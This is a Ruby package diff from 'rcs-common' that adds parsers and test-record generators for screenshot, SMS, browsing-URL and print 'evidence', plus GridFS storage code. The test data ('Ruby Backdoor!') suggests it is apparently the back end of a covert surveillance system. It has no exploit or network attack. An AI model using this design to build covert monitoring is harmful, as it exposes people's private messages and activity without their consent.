rcs-common 9.6.0

data/lib/rcs-common/evidence/print.rb

@@ -0,0 +1,50 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+module PrintEvidence
+  
+  PRINT_VERSION = 2009031201
+  
+  def content
+    path = File.join(File.dirname(__FILE__), 'content', 'print', '001.jpg')
+    File.open(path, 'rb') {|f| f.read }
+  end
+  
+  def generate_content
+    [ content ]
+  end
+  
+  def additional_header
+    name = 'ASP_Common.h'.to_utf16le_binary
+    header = StringIO.new
+    header.write [PRINT_VERSION, name.size].pack("I*")
+    header.write name
+
+    header.string
+  end
+  
+  def decode_additional_header(data)
+    raise EvidenceDeserializeError.new("incomplete PRINT") if data.nil? or data.bytesize == 0
+
+    binary = StringIO.new data
+
+    version, name_len = binary.read(8).unpack("I*")
+    raise EvidenceDeserializeError.new("invalid log version for PRINT") unless version == PRINT_VERSION
+
+    ret = Hash.new
+    ret[:data] = Hash.new
+    ret[:data][:spool] = binary.read(name_len).utf16le_to_utf8
+    return ret
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] ||= Hash.new
+    info[:grid_content] = chunks.first
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/evidence/screenshot.rb

@@ -0,0 +1,53 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+module ScreenshotEvidence
+  
+  SCREENSHOT_VERSION = 2009031201
+  
+  def content
+    path = File.join(File.dirname(__FILE__), 'content', 'screenshot', '00' + (rand(3) + 1).to_s + '.jpg')
+    File.open(path, 'rb') {|f| f.read }
+  end
+  
+  def generate_content
+    [ content ]
+  end
+  
+  def additional_header
+    process_name = 'ruby'.to_utf16le_binary
+    window_name = 'Ruby Backdoor!'.to_utf16le_binary
+    header = StringIO.new
+    header.write [SCREENSHOT_VERSION, process_name.size, window_name.size].pack("I*")
+    header.write process_name
+    header.write window_name
+    
+    header.string
+  end
+  
+  def decode_additional_header(data)
+    raise EvidenceDeserializeError.new("incomplete SCREENSHOT") if data.nil? or data.bytesize == 0
+
+    binary = StringIO.new data
+
+    version, process_name_len, window_name_len = binary.read(12).unpack("I*")
+    raise EvidenceDeserializeError.new("invalid log version for SCREENSHOT") unless version == SCREENSHOT_VERSION
+
+    ret = Hash.new
+    ret[:data] = Hash.new
+    ret[:data][:program] = binary.read(process_name_len).utf16le_to_utf8
+    ret[:data][:window] = binary.read(window_name_len).utf16le_to_utf8
+    return ret
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] ||= Hash.new
+    info[:grid_content] = chunks.join
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/evidence/sms.rb

@@ -0,0 +1,91 @@
+require_relative 'common'
+require 'rcs-common/serializer'
+
+module RCS
+
+  module SmsoldEvidence
+    def content
+      raise "Not implemented!"
+    end
+
+    def generate_content
+      raise "Not implemented!"
+    end
+
+    def decode_content(common_info, chunks)
+
+      info = Hash[common_info]
+      info[:data] ||= Hash.new
+      info[:data][:type] = :sms
+
+      stream = StringIO.new chunks.join
+      @sms = MAPISerializer.new.unserialize stream
+
+      info[:da] = @sms.delivery_time
+      info[:data][:from] = @sms.fields[:from].delete("\x00")
+      info[:data][:rcpt] = @sms.fields[:rcpt].delete("\x00")
+      info[:data][:content] = @sms.fields[:subject]
+      info[:data][:incoming] = @sms.flags
+
+      yield info if block_given?
+      :keep_raw
+    end
+  end # ::SmsoldEvidence
+
+  module SmsEvidence
+
+    SMS_VERSION = 2010050501
+
+    def content
+      "test sms".to_utf16le_binary_null
+    end
+
+    def generate_content
+      [ content ]
+    end
+
+    def additional_header
+      header = StringIO.new
+      header.write [SMS_VERSION].pack("l")
+      header.write [[0,1].sample].pack("l") # incoming
+      time = Time.now.getutc.to_filetime
+      header.write time.pack('L*')
+      header.write "+39123456789".ljust(16, "\x00")
+      header.write "+39987654321".ljust(16, "\x00")
+      header.string
+    end
+
+    def decode_additional_header(data)
+      binary = StringIO.new data
+
+      version = binary.read(4).unpack('l').first
+      raise EvidenceDeserializeError.new("invalid log version for SMS") unless version == SMS_VERSION
+
+      ret = Hash.new
+      ret[:data] = Hash.new
+
+      ret[:data][:incoming] = binary.read(4).unpack('l').first
+      low, high = binary.read(8).unpack('L2')
+      # ignore this time value, it's the same as the acquired in the common header
+      # Time.from_filetime high, low
+      ret[:data][:from] = binary.read(16).delete("\x00")
+      ret[:data][:rcpt] = binary.read(16).delete("\x00")
+
+      return ret
+    end
+
+    def decode_content(common_info, chunks)
+      info = Hash[common_info]
+      info[:data] ||= Hash.new
+      info[:data][:type] = :sms
+
+      stream = StringIO.new chunks.join
+
+      info[:data][:content] = stream.read.utf16le_to_utf8
+
+      yield info if block_given?
+      :delete_raw
+    end
+  end # ::SmsEvidence
+
+end # ::RCS

data/lib/rcs-common/evidence/url.rb

@@ -0,0 +1,133 @@
+require 'rcs-common/evidence/common'
+
+require 'CGI'
+
+module RCS
+
+module UrlEvidence
+
+  VERSION_DELIMITER = 0x20100713
+  ELEM_DELIMITER = 0xABADC0DE
+  BROWSER_TYPE = ['Unknown', 'Internet Explorer', 'Firefox', 'Opera', 'Safari', 'Chrome', 'Mobile Safari', 'Browser', 'Web']
+
+  def decode_query(url)
+    query = []
+    query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['google']
+    query = url.scan(/(?:&?|^)p=([^&]*)(?:&|$)/).first if url['yahoo']
+    query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['bing']
+    
+    return CGI::unescape query.first unless query.nil? or query.empty?
+    return ''
+  end
+
+  def content
+    browser = [1, 2, 3, 4, 5, 6].sample
+    r = rand(4)
+    url = ["http://www.google.it/#hl=it&source=hp&q=pippo+baudo&aq=f&aqi=g10&aql=&oq=&gs_rfai=&fp=67a9a41ace8bb1ed", "http://reader.google.com", "https://www.facebook.com", "www.stackoverflow.com"][r].to_utf16le_binary_null
+    window = ["Google Search", "Google Reader", "Facebook", "Stackoverflow"][r].to_utf16le_binary_null
+
+    content = StringIO.new
+    t = Time.now.getutc
+    content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
+    content.write [ VERSION_DELIMITER ].pack('L')
+    content.write url
+    content.write [ browser ].pack('L')
+    content.write window
+    content.write [ ELEM_DELIMITER ].pack('L')
+
+    content.string
+  end
+  
+  def generate_content
+    ret = Array.new
+    10.rand_times { ret << content() }
+    ret
+  end
+  
+  def decode_content(common_info, chunks)
+    stream = StringIO.new chunks.join
+
+    until stream.eof?
+      info = Hash[common_info]
+      info[:data] = Hash.new if info[:data].nil?
+
+      tm = stream.read 36
+      info[:da] = Time.gm(*tm.unpack('L*'), 0)
+      info[:data][:url] = ''
+      info[:data][:title] = ''
+
+      delim = stream.read(4).unpack('L').first
+      raise EvidenceDeserializeError.new("Malformed evidence (invalid URL version)") unless delim == VERSION_DELIMITER
+      
+      url = stream.read_utf16le_string
+      info[:data][:url] = url.utf16le_to_utf8 unless url.nil?
+      browser = stream.read(4).unpack('L').first
+      info[:data][:program] = BROWSER_TYPE[browser]
+      window = stream.read_utf16le_string
+      info[:data][:title] = window.utf16le_to_utf8 unless window.nil?
+      info[:data][:keywords] = decode_query info[:data][:url]
+      
+      delim = stream.read(4).unpack('L').first
+      raise EvidenceDeserializeError.new("Malformed URL (missing delimiter)") unless delim == ELEM_DELIMITER
+
+      yield info if block_given?
+      :delete_raw
+    end
+  end
+
+end
+
+module UrlcaptureEvidence
+  include UrlEvidence
+
+  URL_VERSION = 2010071301
+
+  def content
+    path = File.join(File.dirname(__FILE__), 'content', 'url', '00' + (rand(3) + 1).to_s + '.jpg')
+    File.open(path, 'rb') {|f| f.read }
+  end
+  
+  def generate_content
+    [ content ]
+  end
+  
+  def additional_header
+    browser = [1, 2, 3, 4, 5, 6].sample
+    r = rand(3)
+    url = ['http://reader.google.com', 'https://www.facebook.com', 'http://www.stackoverflow.com'][r].to_utf16le_binary
+    window = ['Google', 'Facebook', 'Stackoverflow'][r].to_utf16le_binary
+    header = StringIO.new
+    header.write [URL_VERSION, browser, url.size, window.size].pack("I*")
+    header.write url
+    header.write window
+    
+    header.string
+  end
+  
+  def decode_additional_header(data)
+    raise EvidenceDeserializeError.new("incomplete URLCAPTURE") if data.nil? or data.bytesize == 0
+
+    binary = StringIO.new data
+
+    version, browser, url_len, window_len = binary.read(16).unpack("I*")
+    raise EvidenceDeserializeError.new("invalid log version for URLCAPTURE") unless version == URL_VERSION
+
+    ret = Hash.new
+    ret[:data] = Hash.new
+    ret[:data][:program] = BROWSER_TYPE[browser]
+    ret[:data][:url] = binary.read(url_len).utf16le_to_utf8
+    ret[:data][:title] = binary.read(window_len).utf16le_to_utf8
+    ret[:data][:keywords] = decode_query ret[:data][:url]
+    return ret
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] ||= Hash.new
+    info[:grid_content] = chunks.join
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/fixnum.rb

@@ -0,0 +1,48 @@
+
+module ByteSize
+
+  KiB = 2**10
+  MiB = 2**20
+  GiB = 2**30
+  TiB = 2**40
+
+  KB = 10**3
+  MB = 10**6
+  GB = 10**9
+  TB = 10**12
+
+  # return the size in a human readable format
+  def to_s_bytes(base = 2)
+
+    base_two = {TiB => 'TiB', GiB => 'GiB', MiB => 'MiB', KiB => 'KiB'}
+    base_ten = {TB => 'TB', GB => 'GB', MB => 'MB', KB => 'kB'}
+
+    values = base_two if base == 2
+    values = base_ten if base == 10
+
+    values.each_pair do |k, v|
+      if self >= k
+        return (self.to_f / k).round(2).to_s + ' ' + v
+      end
+    end
+
+    # case when is under KiB
+    return self.to_s + ' B'
+
+  end
+
+end
+
+class Fixnum
+  include ByteSize
+end
+
+class Float
+  include ByteSize
+end
+
+# we need to add it even to Bignum for windows32 compatibility
+# everything over a GiB is Bignum...
+class Bignum
+  include ByteSize
+end

data/lib/rcs-common/gridfs.rb

@@ -0,0 +1,294 @@
+require 'digest/md5'
+require 'rcs-common/mongoid'
+
+module RCS
+  module Common
+    module GridFS
+      BSON = Moped::BSON if Mongoid::VERSION < '4.0.0'
+
+      class ReadOnlyFile
+        attr_reader :attributes, :bucket, :file_position
+
+        def initialize(bucket, attributes)
+          @attributes = attributes
+          @bucket = bucket
+          @last_chunk_num = (@attributes[:length].to_f / @attributes[:chunk_size]).ceil - 1
+          rewind
+        end
+
+        def method_missing(name)
+          raise NoMethodError.new(name.inspect) unless @attributes.has_key?(name)
+          @attributes[name]
+        end
+
+        def read(bytes_to_read = nil)
+          data = ''
+
+          return data if @file_position >= @attributes[:length]
+          return data if bytes_to_read and bytes_to_read <= 0
+
+          if @current_chunk[:n]
+            chunk_size = @attributes[:chunk_size]
+            offset = @file_position % chunk_size
+            offset = chunk_size if offset == 0
+            data = @current_chunk[:data][offset..-1] || ''
+          end
+
+          if bytes_to_read.nil? or bytes_to_read > data.bytesize
+            loop do
+              break unless read_next_chunk
+              data << @current_chunk[:data]
+
+              break if bytes_to_read and bytes_to_read <= data.bytesize
+            end
+          end
+
+          bytes_to_read = bytes_to_read ? bytes_to_read - 1 : -1
+          data = data[0..bytes_to_read]
+          @file_position += data.bytesize
+          data
+        end
+
+        def rewind
+          @current_chunk = {n: nil, data: nil}
+          @file_position = 0
+        end
+
+        def eof?
+          @file_position >= @attributes[:length]
+        end
+
+        def id
+          @attributes[:_id]
+        end
+
+        def file_length
+          @attributes[:length]
+        end
+
+        alias :content :read
+        alias :tell :file_position
+        alias :position :file_position
+        alias :pos :file_position
+
+        private
+
+        def read_next_chunk
+          chunk_num = @current_chunk[:n] ? @current_chunk[:n] + 1 : 0
+          return nil if chunk_num == @last_chunk_num + 1
+
+          chunk = bucket.chunks_collection.find(files_id: @attributes[:_id], n: chunk_num).first
+          # chunk maybe nil in case of corrupted data
+          # e.g.: declared length different than the actual length
+          return nil unless chunk
+
+          @current_chunk = {n: chunk['n'], data: chunk['data'].data}
+        end
+      end
+
+      class Bucket
+        attr_reader :name, :mongoid_session_name
+
+        DEFAULT_NAME          = 'fs'
+        DEFAULT_CONTENT_TYPE  = 'application/octet-stream'
+        DEFAULT_CHUNK_SIZE    =  262144
+        BINARY_ENCODING       = 'BINARY'
+
+        def initialize(name = DEFAULT_NAME, options = {})
+          @name                 = name.to_s.downcase.strip
+          @name                 = DEFAULT_NAME if @name.empty?
+          @mongoid_session_name = options[:mongoid_session_name] || :default
+          @setup_on_write       = options[:lazy].nil? ? true : options[:lazy]
+          @osx                  = RbConfig::CONFIG['host_os'] =~ /darwin/
+
+          setup unless @setup_on_write
+        end
+
+        def session_options
+          # Allow unsafe write on OSX.
+          # @see https://github.com/mongoid/mongoid/issues/3582
+
+          @osx ? {safe: false} : {}
+        end
+
+        def session
+          Mongoid.session(mongoid_session_name).with(session_options)
+        end
+
+        def files_collection
+          session[:"#{name}.files"]
+        end
+
+        def chunks_collection
+          session[:"#{name}.chunks"]
+        end
+
+        def put(content, attrs = {}, options = {})
+          return if content.nil?
+
+          file = {}
+
+          file[:_id]         = BSON::ObjectId.new
+          file[:length]      = content.bytesize
+          file[:chunkSize]   = DEFAULT_CHUNK_SIZE
+
+          return if file[:length].zero?
+
+          file[:filename]    = attrs[:filename]
+          file[:contentType] = attrs[:content_type] || attrs[:contentType] || DEFAULT_CONTENT_TYPE
+          file[:aliases]     = attrs[:aliases] || []
+          file[:aliases]     = [file[:aliases]].flatten
+          file[:metadata]    = attrs[:metadata] || {}
+          file[:metadata]    = {} if file[:metadata].blank?
+          file[:uploadDate]  = attrs[:upload_date] || attrs[:uploadDate] || Time.now.utc
+
+          file[:md5] = write(file[:_id], content, options)
+
+          files_collection.insert(file)
+
+          file[:_id]
+        end
+
+        def md5(file_id)
+          doc = session.command(filemd5: file_id, root: name)
+          doc['md5'] if doc.respond_to?(:[])
+        end
+
+        def append(file_id, data, options = {})
+          attributes = if options[:filename]
+            files_collection.find(filename: file_id).first
+          else
+            file_id = objectid(file_id)
+            files_collection.find(_id: file_id).first
+          end
+
+          if !attributes and options[:create]
+            file_attributes = options[:create].respond_to?(:[]) ? options[:create] : {}
+            new_file_id = put(data, file_attributes, options)
+            return [new_file_id, data.bytesize]
+          end
+
+          raise("File not found: #{file_id}") unless attributes
+
+          attributes = attributes.to_h.symbolize_keys
+
+          file_id = objectid(attributes[:_id])
+
+          length, chunk_size = attributes[:length], attributes[:chunkSize]
+
+          chunk_offset = (length / chunk_size).to_i
+          offset = length % chunk_size
+
+          if offset > 0
+            data = chunks_collection.find(files_id: file_id, n: chunk_offset).first['data'].data + data
+          end
+
+          chunkerize(data) do |chunk_data, chunk_num|
+            chunks_collection.find(files_id: file_id, n: chunk_num + chunk_offset).upsert('$set' => {data: binary(chunk_data)})
+          end
+
+          new_md5 = md5(file_id) if options[:md5] != false
+          new_length = length - offset + data.bytesize
+
+          files_collection.find(_id: file_id).update('$set' => {length: new_length, md5: new_md5})
+
+          [file_id, new_length]
+        end
+
+        # Equivalent to #get(id).read
+        def content(file_id)
+          file_id = objectid(file_id)
+
+          chunks_collection.find(files_id: file_id, n: {'$gte' => 0}).inject("") do |data, chunk|
+            data << chunk['data'].data
+          end
+        end
+
+        def get(file_id, options = {})
+          file_id = objectid(file_id)
+          attributes = files_collection.find(_id: file_id).first
+
+          return unless attributes
+
+          attributes = attributes.to_h.symbolize_keys
+          attributes[:bucket] = self
+          attributes[:chunk_size] = attributes[:chunkSize]
+          attributes[:content_type] = attributes[:contentType]
+          attributes[:upload_date] = attributes[:uploadDate]
+
+          ReadOnlyFile.new(self, attributes)
+        end
+
+        def delete(file_id)
+          file_id = objectid(file_id)
+
+          files_collection.find(_id: file_id).remove
+          chunks_collection.find(files_id: file_id).remove_all
+
+          return nil
+        end
+
+        def drop
+          [files_collection, chunks_collection].map(&:drop)
+          @setup_on_write = true
+        end
+
+        alias :remove :delete
+
+        private
+
+        def objectid(id)
+          id.respond_to?(:generation_time) ? id : BSON::ObjectId.from_string(id.to_s)
+        end
+
+        def setup
+          chunks_collection.indexes.create({files_id: 1, n: 1}, {unique: true})
+          # This is an optional index (not required by the gridfs specs)
+          files_collection.indexes.create({filename: 1}, {background: true})
+          nil
+        end
+
+        def chunkerize(data)
+          offset = 0
+          chunk_num = 0
+
+          loop do
+            chunk_data = data.byteslice(offset..(offset + DEFAULT_CHUNK_SIZE - 1))
+            break if chunk_data.nil?
+            chunk_data_size = chunk_data.bytesize
+            offset += chunk_data_size
+            break if chunk_data_size == 0
+            yield(chunk_data, chunk_num)
+            break if chunk_data_size < DEFAULT_CHUNK_SIZE
+            chunk_num += 1
+          end
+        end
+
+        def write(file_id, data, options = {})
+          @setup_on_write = setup if @setup_on_write
+
+          md5 = Digest::MD5.new if options[:md5] != false
+
+          chunkerize(data) do |chunk_data, chunk_num|
+            chunks_collection.insert(files_id: file_id, n: chunk_num, data: binary(chunk_data))
+            md5.update(chunk_data) if md5
+          end
+
+          md5.hexdigest if md5
+        end
+
+        if Mongoid::VERSION < '4.0.0'
+          def binary(data)
+            data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
+            BSON::Binary.new(:generic, data)
+          end
+        else
+          def binary(data)
+            data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
+            BSON::Binary.new(data, :generic)
+          end
+        end
+      end
+    end
+  end
+end